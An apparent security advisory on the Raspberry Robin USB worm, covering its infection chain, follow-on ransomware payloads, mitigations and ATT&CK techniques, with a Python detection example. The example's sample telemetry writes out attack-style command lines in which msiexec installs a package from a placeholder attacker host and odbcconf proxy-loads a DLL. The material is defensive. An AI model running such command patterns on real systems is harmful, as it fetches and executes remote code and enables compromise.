Initially seen in technology and manufacturing organisations, the worm has now spread through government agencies and telecommunication entities in Latin America, Australia and Europe.
Severity level: High – Exploitation is likely to lead to further malicious activity, with human operated ransomware and other types of malware being observed.
Raspberry Robin was initially seen spreading via infected external drives but Microsoft is now aware of at least four confirmed Raspberry Robin entry vectors.
The malware uses Windows Installer to communicate with compromised QNAP-associated domains to download and install malicious DLL files to the infected device.
The USB payload behaviour follows five distinct steps:
1. Infected external device attached to victim’s computer
2. Cmd.exe reads and executes malicious file then launches msiexec.exe that reaches out to malicious URL
3. Malicious DLL installed from the previously connected URL
4. Rundll32.exe launches legitimate Windows utility to execute malicious DLL
5. Outbound connections attempted, usually to TOR networks.
Researchers at Avast have documented a heavily obfuscated DLL backdoor used by Raspberry Robin, which they’ve named Roshtyak.
Depending on the network’s settings, an infected USB drive may autorun the malware or trick a user into manual execution.
Successful execution can result in the compromise of the system. This may lead to further attacks and the loss of sensitive data.
Microsoft has been closely tracking Raspberry Robin activity and current builds of Microsoft Defender can alert users to exploitation by flagging at stage 3 of the attack chain.
Logs may also be searched for unexpected msiexec.exe activity and DLL downloads/connections.
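The log search suggested above, as an added example that is not from the advisory, Microsoft or Avast: a Python pass over constructed Sysmon-style process-creation records that flags the stage 2 behaviour (msiexec.exe installing from a URL) and the stage 4 behaviour (rundll32.exe handing a DLL to a second signed proxy binary, odbcconf as in the ATT&CK list below). All domains, paths and command lines in the sample are constructed placeholders, not real indicators.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent: str   # parent process image name
    image: str    # created process image name
    cmdline: str  # full command line


URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Signed Windows binaries the ATT&CK list names as DLL execution proxies
DLL_PROXIES = {"odbcconf.exe", "regsvr32.exe", "rundll32.exe"}


def detect(events):
    """Return (stage, reason, cmdline) for each event matching the USB chain."""
    findings = []
    for ev in events:
        img, par, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
        # Stage 2: msiexec pulling its package from a URL rather than a local .msi
        if img == "msiexec.exe" and URL_RE.search(cmd):
            findings.append((2, "msiexec.exe installing from a URL", ev.cmdline))
        # Stage 4: rundll32 chaining into another proxy binary to load a DLL
        elif par == "rundll32.exe" and img in DLL_PROXIES and ".dll" in cmd:
            findings.append((4, f"rundll32.exe launched {img} to run a DLL", ev.cmdline))
    return findings


# Constructed sample telemetry; the domain and paths are placeholders, not IoCs.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "cmd.exe",
                 "cmd.exe /R start msiexec.exe /q /i http://placeholder-c2.invalid/pkg"),
    ProcessEvent("cmd.exe", "msiexec.exe",
                 "msiexec.exe /q /i http://placeholder-c2.invalid/pkg"),
    ProcessEvent("rundll32.exe", "odbcconf.exe",
                 "odbcconf.exe /a {REGSVR C:\\ProgramData\\placeholder\\stage.dll}"),
    # Benign controls: a local .msi install and an ordinary rundll32 invocation
    ProcessEvent("explorer.exe", "msiexec.exe",
                 "msiexec.exe /i C:\\Users\\user\\Downloads\\setup.msi"),
    ProcessEvent("svchost.exe", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for stage, reason, cmdline in detect(SAMPLE_EVENTS):
        print(f"stage {stage}: {reason}: {cmdline}")
```

The benign records are there to show the rules are keyed on the URL source and the rundll32-to-proxy chain, not on msiexec.exe or rundll32.exe alone.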
Containment, Mitigations & Remediations
It is strongly recommended that customers have an effective endpoint detection & response (EDR) solution in place to help protect against this type of attack.
Untrained users should not investigate unknown external media devices. Aside from the possibility of malicious files or exploit code, one well-known attack is for the USB device to present to the host operating system as a keyboard and start typing malicious commands. This can present issues for investigators.
Microsoft reports that their attack surface reduction rules have been successful in mitigating the attack in its early stages.
Indicators of Compromise
Raspberry Robin reported hash values:
Raspberry Robin associated IPs:
Raspberry Robin has been spreading since its initial discovery at the tail end of 2021. Initially spreading relatively slowly, it is now one of the largest malware distribution platforms currently active. Microsoft reports that nearly 3,000 devices in almost 1,000 organisations have seen at least one Raspberry Robin payload-related alert in October 2022.
Infection by Raspberry Robin has at different times led to the deployment of IcedID, Bumblebee and TrueBot payloads, indicating that its operators may be providing initial access to a number of other threat actors.
In July 2022, Microsoft reported FakeUpdates (SocGholish) malware being delivered via existing Raspberry Robin infections, leading to DEV-0243 activity (EvilCorp).
In October 2022, Microsoft researchers observed Raspberry Robin infections followed by Cobalt Strike activity from DEV-0950 (FIN11/TA505) leading to deployment of Clop ransomware.
T1036 – Masquerading
T1091 – Replication Through Removable Media
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
T1218.011 – System Binary Proxy Execution: Rundll32
T1218.008 – System Binary Proxy Execution: Odbcconf
T1218.007 – System Binary Proxy Execution: Msiexec
T1218.010 – System Binary Proxy Execution: Regsvr32
T1574.002 – Hijack Execution Flow: DLL Side-Loading
T1071.001 – Application Layer Protocol: Web Protocols
T1105 – Ingress Tool Transfer